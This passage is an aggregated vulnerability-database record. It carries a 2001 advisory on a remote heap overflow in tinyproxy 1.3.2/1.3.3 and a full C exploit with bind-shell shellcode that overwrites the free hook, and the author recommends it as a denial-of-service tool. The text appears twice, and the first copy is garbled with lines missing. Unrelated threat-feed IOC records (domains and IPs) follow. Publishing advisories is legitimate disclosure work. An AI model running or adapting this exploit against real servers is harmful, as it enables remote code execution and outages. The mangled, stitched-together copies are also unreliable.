where BUFFER is defined 2048.
as you can see msg is copied 3 times into outbuf.. so we can overflow it.
We can write what we want in msg by putting something different from
"http://" in the connect request
bash-2.03# telnet 0 8888
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
connect [lots of A]://
Connection closed by foreign host.
Exploiting this program is hard. The problem is that nothing is allocated
between the malloc of our buf and the bugged sprintf. To exploit we must
overwrite any structure after our buf.. but in many cases there's nothing
after it. For some values of the size of the buffer that we send the target
is not at the end.. so we can overwrite something. Those values changes in
dependence of which distribution you run. Unfortunately for redhat 7.0 and
slackware I wasn't unable to hit correctly the struct. For the values that
make segfault free() the chunk is not hitted by a string that we're able
to control. I don't have more time to dedicate to this xploit. I include it so
if someone got more time can try it on other distros.
Anyway.. you can always use it as a dos.. setting a large buffsize:
the sprintf will segfault trying to write out of the heap.
--- PKCtiny-ex.c ---
/
* Exploit for tinyproxy 1.3.2 and 1.3.3
* by |CyRaX| <cyrax@pkcrew.org>
* Packet Knights Crew - www.pkcrew.org
* READ THE ADVISORY FIRST !
* Greetz :
* bikappa: for some help
* all the pkc members expecially recidjvo, asynchro and cthulhu
* all the other friends
/
void usage(){
printf("Exploit for Tinyproxy 1.3.2 and 1.3.3 by |CyRaX|
<cyrax@pkcrew.org>\n");
printf("Packet Knights Crew - http://www.pkcrew.org\n");
printf("please.. READ the advisory first!\n");
printf("Usage : ./PKCtiny-ex <host> <port> <buf_size> <struct offset>
<free_hook> <shellcode>\n");
printf("buf_size is the size of the buf we send\n");
printf("struct offset is the distance from the beginning of the buffer we
send where we\n");
printf(" we put the malloc chunk struct!\n");
printf("free_hook is the address of the free_hook function pointer\n");
printf("shellcode is the address of the shellcode (you don't neet to hit it
correctly\n");
printf(" you can just hope to it a jump\n");
printf("\nfree_hook and shellcode must be given in 0xaddress format\n");
exit(0);
}
int main(int argc, char argv){
int s,i,err,pid[5];
struct sockaddr_in dst;
struct malloc_chunk{
unsigned int ps;
unsigned int sz;
struct malloc_chunk fd;
struct malloc_chunk bk;
}mc;
char magic,sndbuff;
unsigned long FREE_HOOKZ,SHELLCODE;
if(argc<5)usage();
magic=(char )malloc(atoi(argv[3])+1);
sndbuff=(char )malloc(atoi(argv[3])+30);
memset(magic,'\x90',atoi(argv[3]));
if((atoi(argv[3])/2)<atoi(argv[4])){
/ putting jmps and shellcode before the struct /
for(i=0;i<(atoi(argv[4])-strlen(c0de)-10);i+=2){
memcpy(magic+i,jmps,2);
}
}
else {
/ putting jmps and shellcode after the struct /
for(i=atoi(argv[4])+sizeof(mc);i<atoi(argv[3])-10-strlen(c0de);i+=2){
memcpy(magic+i,jmps,2);
}
}
memcpy(magic+i,c0de,strlen(c0de));
magic[atoi(argv[3])]=0;
printf("strlen magic is %i\n",strlen(magic));
sndbuff[snprintf(sndbuff,atoi(argv[3])+20,"connect %s://\n",magic)]=0;
printf("shooting\n");
err=send(s,sndbuff,strlen(sndbuff),0);
}
EOF
|CyRaX|
Member Of Packet Knights Crew
www.pkcrew.org
{"id": "SECURITYVULNS:DOC:1177", "bulletinFamily": "software", "title": "[pkc] remote heap overflow in tinyproxy", "description": "--- Packet Knights Advisory 002 ---\r\n ---pkc002.txt---\r\n\r\n\r\nhttp://www.pkcrew.org\r\n\r\nAuthor : |CyRaX| <cyrax@pkcrew.org>\r\n\r\nApplication : Tinyproxy version 1.3.2 and 1.3.3\r\n\r\nType : heap buffer overflow\r\n\r\n--- The Problem ---\r\n\r\nFunction http_err in utils.c :\r\n\r\nint httperr(struct conn_s *connptr, int err, char *msg)\r\n{\r\n char *outbuf;\r\n[..]\r\n outbuf = xmalloc(BUFFER);\r\n sprintf(outbuf, premsg, err, msg, msg, err, msg, VERSION);\r\n\r\n\r\nwhere BUFFER is defined 2048.\r\nas you can see msg is copied 3 times into outbuf.. so we can overflow it.\r\nWe can write what we want in msg by putting something different from\r\n"http://" in the connect request\r\n\r\nbash-2.03# telnet 0 8888\r\nTrying 0.0.0.0...\r\nConnected to 0.\r\nEscape character is '^]'.\r\nconnect [lots of A]://\r\nConnection closed by foreign host.\r\n\r\n\r\n\r\n--- The solution ---\r\n\r\nchange the sprintf into snprintf:\r\n\r\nsnprintf(outbuf,BUFFER,premsg,err,msg,msg,err,msg,VERSION);\r\n\r\n(authors were contacted)\r\n\r\n--- The exploitation ---\r\n\r\nExploiting this program is hard. The problem is that nothing is allocated\r\nbetween the malloc of our buf and the bugged sprintf. To exploit we must\r\noverwrite any structure after our buf.. but in many cases there's nothing\r\nafter it. For some values of the size of the buffer that we send the target\r\nis not at the end.. so we can overwrite something. Those values changes in\r\ndependence of which distribution you run. Unfortunately for redhat 7.0 and\r\nslackware I wasn't unable to hit correctly the struct. For the values that\r\nmake segfault free() the chunk is not hitted by a string that we're able\r\nto control. I don't have more time to dedicate to this xploit. I include it so\r\nif someone got more time can try it on other distros.\r\nAnyway.. you can always use it as a dos.. setting a large buffsize:\r\nthe sprintf will segfault trying to write out of the heap.\r\n\r\n\r\n--- PKCtiny-ex.c ---\r\n/*\r\n * Exploit for tinyproxy 1.3.2 and 1.3.3\r\n * by |CyRaX| <cyrax@pkcrew.org>\r\n * Packet Knights Crew - www.pkcrew.org\r\n * READ THE ADVISORY FIRST !\r\n * Greetz :\r\n * bikappa: for some help\r\n * all the pkc members expecially recidjvo, asynchro and cthulhu\r\n * all the other friends\r\n*/\r\n\r\n\r\n#include <stdio.h>\r\n#include <stdlib.h>\r\n#include <netinet/in.h>\r\n\r\nchar jmps[]="\xeb\x0e";\r\n\r\nchar c0de[]="\xeb\x0e\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"\r\n "\x90\x90\x90\x90\x90\x90\x90"\r\n "\x89\xe5"\r\n "\x31\xd2\xb2\x66\x89\xd0\x31\xc9\x89\xcb\x43\x89\x5d\xf8"\r\n "\x43\x89\x5d\xf4\x4b\x89\x4d\xfc\x8d\x4d\xf4\xcd\x80\x31\xc9\x89"\r\n "\x45\xf4\x43\x66\x89\x5d\xec\x66\xc7\x45\xee\x0f\x27\x89\x4d\xf0"\r\n "\x8d\x45\xec\x89\x45\xf8\xc6\x45\xfc\x10\x89\xd0\x8d\x4d\xf4\xcd"\r\n "\x80\x89\xd0\x43\x43\xcd\x80\x89\xd0\x43\xcd\x80\x89\xc3\x31\xc9"\r\n "\x80\xea\x27\x89\xd0\xcd\x80\x89\xd0\x41\xcd\x80\xeb\x1f\x5e"\r\n "\x80\x46\x04\x01"\r\n "\x80\x06\x01"\r\n "\x89\x75"\r\n "\x08\x31\xc0\x88\x46\x07\x89\x45\x0c\xb0\x0b\x89\xf3\x8d\x4d\x08"\r\n \r\n"\x8d\x55\x0c\xcd\x80\xe8\xdc\xff\xff\xff\x2e\x62\x69\x6e\x2e\x73\x68";\r\n\r\nvoid usage();\r\n\r\nvoid usage(){\r\n printf("Exploit for Tinyproxy 1.3.2 and 1.3.3 by |CyRaX|\r\n<cyrax@pkcrew.org>\n");\r\n printf("Packet Knights Crew - http://www.pkcrew.org\n");\r\n printf("please.. READ the advisory first!\n");\r\n printf("Usage : ./PKCtiny-ex <host> <port> <buf_size> <struct offset>\r\n<free_hook> <shellcode>\n");\r\n printf("buf_size is the size of the buf we send\n");\r\n printf("struct offset is the distance from the beginning of the buffer we\r\nsend where we\n");\r\n printf(" we put the malloc chunk struct!\n");\r\n printf("free_hook is the address of the free_hook function pointer\n");\r\n printf("shellcode is the address of the shellcode (you don't neet to hit it\r\ncorrectly\n");\r\n printf(" you can just hope to it a jump\n");\r\n printf("\nfree_hook and shellcode must be given in 0xaddress format\n");\r\n exit(0);\r\n}\r\n\r\nint main(int argc, char **argv){\r\n int s,i,err,pid[5];\r\n struct sockaddr_in dst;\r\n struct malloc_chunk{\r\n unsigned int ps;\r\n unsigned int sz;\r\n struct malloc_chunk *fd;\r\n struct malloc_chunk *bk;\r\n }mc;\r\n char *magic,*sndbuff;\r\n unsigned long FREE_HOOKZ,SHELLCODE;\r\n if(argc<5)usage();\r\n magic=(char *)malloc(atoi(argv[3])+1);\r\n sndbuff=(char *)malloc(atoi(argv[3])+30);\r\n memset(magic,'\x90',atoi(argv[3]));\r\n\r\n SHELLCODE=strtol(argv[6],NULL,16);\r\n FREE_HOOKZ=strtol(argv[5],NULL,16);\r\n\r\n\r\n dst.sin_addr.s_addr=inet_addr(argv[1]);\r\n dst.sin_port=htons(atoi(argv[2]));\r\n dst.sin_family=AF_INET;\r\n mc.ps=0xffffffff & ~1;\r\n mc.sz=0xffffffff;\r\n mc.fd=(struct malloc_chunk *)(SHELLCODE);\r\n mc.bk=(struct malloc_chunk *)(FREE_HOOKZ-8);\r\n\r\n s=socket(AF_INET,SOCK_STREAM,0);\r\n connect(s,(struct sockaddr *)&dst,sizeof(dst));\r\n memcpy(magic+atoi(argv[4]),&mc,sizeof(mc));\r\n\r\n if((atoi(argv[3])/2)<atoi(argv[4])){\r\n /* putting jmps and shellcode before the struct */\r\n for(i=0;i<(atoi(argv[4])-strlen(c0de)-10);i+=2){\r\n memcpy(magic+i,jmps,2);\r\n }\r\n }\r\n else {\r\n /* putting jmps and shellcode after the struct */\r\n for(i=atoi(argv[4])+sizeof(mc);i<atoi(argv[3])-10-strlen(c0de);i+=2){\r\n memcpy(magic+i,jmps,2);\r\n }\r\n }\r\n memcpy(magic+i,c0de,strlen(c0de));\r\n\r\n magic[atoi(argv[3])]=0;\r\n\r\n printf("strlen magic is %i\n",strlen(magic));\r\n sndbuff[snprintf(sndbuff,atoi(argv[3])+20,"connect %s://\n",magic)]=0;\r\n printf("shooting\n");\r\n err=send(s,sndbuff,strlen(sndbuff),0);\r\n}\r\n\r\nEOF\r\n\r\n\r\n|CyRaX|\r\nMember Of Packet Knights Crew\r\nwww.pkcrew.org", "published": "2001-01-17T00:00:00", "modified": "2001-01-17T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:1177", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:04", "edition": 1, "viewCount": 9, "enchantments": {"score": {"value": 2.6, "vector": "NONE", "modified": "2018-08-31T11:10:04", "rev": 2}, "dependencies": {"references": [{"type": "nessus", "idList": ["EULEROS_SA-2020-1498.NASL", "EULEROS_SA-2020-1457.NASL", "EULEROS_SA-2020-1496.NASL", "EULEROS_SA-2020-1477.NASL", "EULEROS_SA-2020-1491.NASL", "EULEROS_SA-2020-1494.NASL", "EULEROS_SA-2020-1483.NASL", "EULEROS_SA-2020-1489.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562311220201494", "OPENVAS:1361412562311220201431", "OPENVAS:1361412562311220201489", "OPENVAS:1361412562311220201457", "OPENVAS:1361412562311220201477", "OPENVAS:1361412562311220201400", "OPENVAS:1361412562311220201491", "OPENVAS:1361412562311220201476", "OPENVAS:1361412562311220201430", "OPENVAS:1361412562311220201473"]}], "modified": "2018-08-31T11:10:04", "rev": 2}, "vulnersScore": 2.6}, "affectedSoftware": []}
{"rst": [{"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **mg-s[.]it** in [RST Threat Feed](https://rstcloud.net/profeed) with score **24**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 62[.]149.128.163,62.149.128.166,62.149.128.151,62.149.128.154,81.2.216.125\nWhois:\n Created: 2008-07-21 08:17:32, \n Registrar: ARUBAREG, \n Registrant: hidden.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:4716CD04-1177-32DC-8983-14A3C97697AE", "href": "", "published": "2021-01-18T00:00:00", "title": "RST Threat feed. IOC: mg-s.it", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **185[.]66.57.55** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **23**.\n First seen: 2020-12-26T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **generic**.\nASN 200509: (First IP 185.66.56.0, Last IP 185.66.59.255).\nASN Name \"SVINTASN\" and Organisation \"\".\nASN hosts 4 domains.\nGEO IP information: City \"Betera\", Country \"Spain\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-26T00:00:00", "id": "RST:0B297CC0-1177-3FEA-8408-D1809DBEDCA6", "href": "", "published": "2021-01-18T00:00:00", "title": "RST Threat feed. IOC: 185.66.57.55", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **193[.]182.111.182** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **2**.\n First seen: 2019-10-27T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **tor_node**.\nASN 197595: (First IP 193.182.111.0, Last IP 193.182.111.255).\nASN Name \"OBENETWORK\" and Organisation \"\".\nASN hosts 1373 domains.\nGEO IP information: City \"\", Country \"Sweden\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-10-27T00:00:00", "id": "RST:ACF5933B-1177-33DA-9797-7098A43404EB", "href": "", "published": "2021-01-18T00:00:00", "title": "RST Threat feed. IOC: 193.182.111.182", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **pc-scan-7547[.]win** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **generic**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:0C696172-1177-3801-A76D-EF6CEE48E15C", "href": "", "published": "2021-01-18T00:00:00", "title": "RST Threat feed. IOC: pc-scan-7547.win", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **cojinesortopedicos[.]com.mx** in [RST Threat Feed](https://rstcloud.net/profeed) with score **24**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 160[.]153.136.3\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:4E899A6F-1177-3266-AED2-06674C7334D8", "href": "", "published": "2021-01-18T00:00:00", "title": "RST Threat feed. IOC: cojinesortopedicos.com.mx", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **edcertificacao[.]com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **24**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **generic**.\nDomain has DNS A records: 177[.]234.145.200\nWhois:\n Created: 2018-05-04 17:39:06, \n Registrar: unknown, \n Registrant: Tucows Domains Inc.\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:70802D40-1177-3060-8D3D-97506DD2663E", "href": "", "published": "2021-01-18T00:00:00", "title": "RST Threat feed. IOC: edcertificacao.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **58[.]22.95.225** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **20**.\n First seen: 2021-01-04T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **shellprobe**.\nASN 4837: (First IP 58.18.112.0, Last IP 58.23.255.255).\nASN Name \"CHINA169BACKBONE\" and Organisation \"CNCGROUP China169 Backbone\".\nASN hosts 537984 domains.\nGEO IP information: City \"Beijing\", Country \"China\".\nIOC could be a **False Positive** (May be a Cloud provider IP).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-04T00:00:00", "id": "RST:1E05724B-1177-3A90-9754-B3EB1E650B76", "href": "", "published": "2021-01-18T00:00:00", "title": "RST Threat feed. IOC: 58.22.95.225", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **z9h2kpcvk5[.]neliver.com** in [RST Threat Feed](https://rstcloud.net/profeed) with score **10**.\n First seen: 2020-12-22T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **generic**.\nIOC could be a **False Positive** (Domain not resolved. Whois records not found).\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2020-12-22T00:00:00", "id": "RST:FF641AE9-1177-32CF-BE83-728166F7A2AC", "href": "", "published": "2021-01-18T00:00:00", "title": "RST Threat feed. IOC: z9h2kpcvk5.neliver.com", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **ruhyxekixob[.]tk** in [RST Threat Feed](https://rstcloud.net/profeed) with score **2**.\n First seen: 2019-12-15T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **spam**.\nDomain has DNS A records: 195[.]20.47.33,194.0.39.1,194.0.41.1\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2019-12-15T00:00:00", "id": "RST:E96EA261-1177-3AFD-BE0C-9EAC93F9C6A5", "href": "", "published": "2021-01-18T00:00:00", "title": "RST Threat feed. IOC: ruhyxekixob.tk", "type": "rst", "cvss": {}}, {"lastseen": "2021-01-17T00:00:00", "bulletinFamily": "ioc", "cvelist": [], "description": "Found **75[.]175.98.202** in [RST Threat Feed](https://www.rstcloud.net/profeed) with score **51**.\n First seen: 2021-01-12T03:00:00, Last seen: 2021-01-17T03:00:00.\n IOC tags: **shellprobe, generic**.\nASN 209: (First IP 75.175.0.0, Last IP 75.175.255.255).\nASN Name \"CENTURYLINKUSLEGACYQWEST\" and Organisation \"Qwest Communications Company LLC\".\nASN hosts 73950 domains.\nGEO IP information: City \"Loxley\", Country \"United States\".\n[https://rstcloud.net/](https://rstcloud.net/)", "edition": 1, "modified": "2021-01-12T00:00:00", "id": "RST:EF0794D9-1177-3B9D-B287-72AE279BCF12", "href": "", "published": "2021-01-18T00:00:00", "title": "RST Threat feed. IOC: 75.175.98.202", "type": "rst", "cvss": {}}]}
